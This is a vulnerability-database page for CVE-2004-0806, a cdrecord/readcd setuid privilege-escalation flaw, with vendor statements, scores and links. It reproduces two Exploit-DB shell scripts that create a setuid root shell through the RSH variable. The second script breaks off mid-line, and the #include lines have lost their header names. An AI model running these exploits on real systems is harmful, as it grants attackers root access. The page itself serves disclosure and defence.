CVE-2004-0806
published 2004-12-31CVE-2004-0806: cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH…
PriorityP432high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.73%
74.7th percentile
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cdrtools | cdrecord | — | — |
| cdrtools | cdrecord | — | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2004-09-09·CVSS 7.2
CVE-2004-0806 [HIGH] security flaw
security flaw
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
Statement: Not vulnerable. cdrecord is not shipped setuid and does not need to be made setuid with Red Hat Enterprise Linux 2.1, 3, or 4 packages.
GHSA
GHSA-gw49-f4qm-3gcc: cdrecord in the cdrtools package before 2
ghsa_unreviewed·2022-05-03
CVE-2004-0806 [HIGH] GHSA-gw49-f4qm-3gcc: cdrecord in the cdrtools package before 2
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
No detection rules found.
Exploit-DB
CDRecord's ReadCD - Local Privilege Escalation
exploitdb·2004-09-19
CVE-2004-0806 CDRecord's ReadCD - Local Privilege Escalation
CDRecord's ReadCD - Local Privilege Escalation
---
#!/bin/bash
echo "readcd-exp.sh -- ReadCD local exploit ( Test on cdrecord-2.01-0.a27.2mdk)"
echo "Author : newbug [at] chroot.org"
echo "Date :09.13.2004"
echo "IRC : irc.chroot.org #discuss"
export READCD=/usr/bin/readcd
cd /tmp
cat > s.c
#include
#include
int main()
{
setuid(0);setgid(0);
chown("/tmp/ss", 0, 0);
chmod("/tmp/ss", 04755);
return 0;
}
_EOF_
cat > ss.c
int main()
{
setuid(0);setgid(0);
execl("/bin/bash","bash",(char *)0);
return 0;
}
_EOF_
gcc -o s s.c
gcc -o ss ss.c
export RSH=/tmp/s
$READCD dev=REMOTE:brk.chroot.org:1,0,1 1 >/dev/null 2>&1
/tmp/ss
// milw0rm.com [2004-09-19]
Exploit-DB
CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation
exploitdb·2004-09-11
CVE-2004-0806 CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation
CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation
---
#!/bin/bash
#
# cdrecord-suidshell.sh - I)ruid [CAU] (09.2004)
#
# Exploits cdrecord's exec() of $RSH before dropping privs
#
cat > ./cpbinbash.c
#include
#include
#include
main( int argc, char *argv[] ) {
int fd1, fd2;
int count;
char buffer[1];
/* Set ID's */
setuid( geteuid() );
setgid( geteuid() );
/* Copy the shell */
if ((fd1=open( "/bin/bash", O_RDONLY))<0)
return -1;
if ((fd2=open( "./bash", O_WRONLY|O_CREAT))<0)
return -1;
while((count=read(fd1, buffer, 1)))
write(fd2, buffer, count);
free(buffer);
close( fd1 );
close( fd2 );
/* Priv the shell */
chown( "./bash", geteuid(), geteuid() );
chmod( "./bash", 3565 );
}
__EOF__
cc ./cpbinbash.c -o ./cpbinbash
# Set up environment
export RSHSAVE=$RSH
export RSH=./cpbinbas
Bugzilla
CVE-2004-0806 security flaw
bugzilla·2018-08-16·CVSS 7.2
CVE-2004-0806 [HIGH] CVE-2004-0806 security flaw
CVE-2004-0806 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
cdrecord in the cdrtools package before 2.01, when installed setuid root, does not properly drop privileges before executing a program specified in the RSH environment variable, which allows local users to gain privileges.
---
Statement:
Not vulnerable. cdrecord is not shipped setuid and does not need to be made setuid with Red Hat Enterprise Linux 2.1, 3, or 4 packages.
Bugzilla
CVE-2004-0813 SG_IO unsafe user command execution
bugzilla·2007-03-13·CVSS 7.2
CVE-2004-0813 [HIGH] CVE-2004-0813 SG_IO unsafe user command execution
CVE-2004-0813 SG_IO unsafe user command execution
bug 133098 describes a flaw in the way the kernel handles certain SG_IO
commands. A user who has access to a /dev/sg file, can do scary things they
shouldn't be able to. In RHEL3 we currently give the console user read/write
access to /dev/sg devices which are also recordable CD drives. This is
obviously a problem.
Fixing this in the kernel will be nearly impossible given how the RHEL3 kernel
works. We can however fix it by changing the way cdrecord works.
If we use consolehelper to launch cdrecord, the end user should notice no change
in behavior, and will allow us to control who is able to execute cdrecord as the
root user.
Discussion:
If we set cdrecord to be setuid root, we will need to add the patch for
CVE-2004-0806, which could
ftp://patches.sgi.com/support/free/security/advisories/20060401-01-Uhttp://seclists.org/lists/bugtraq/2004/Sep/0097.htmlhttp://secunia.com/advisories/12481/http://secunia.com/advisories/19532http://securitytracker.com/id?1011091http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-09/0108.htmlhttp://www.kb.cert.org/vuls/id/700326http://www.mandriva.com/security/advisories?name=MDKSA-2004:091http://www.securityfocus.org/bid/11075https://bugzilla.fedora.us/show_bug.cgi?id=2058https://exchange.xforce.ibmcloud.com/vulnerabilities/17303https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9805ftp://patches.sgi.com/support/free/security/advisories/20060401-01-Uhttp://seclists.org/lists/bugtraq/2004/Sep/0097.htmlhttp://secunia.com/advisories/12481/http://secunia.com/advisories/19532http://securitytracker.com/id?1011091http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-09/0108.htmlhttp://www.kb.cert.org/vuls/id/700326http://www.mandriva.com/security/advisories?name=MDKSA-2004:091http://www.securityfocus.org/bid/11075https://bugzilla.fedora.us/show_bug.cgi?id=2058https://exchange.xforce.ibmcloud.com/vulnerabilities/17303https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9805
2004-12-31
Published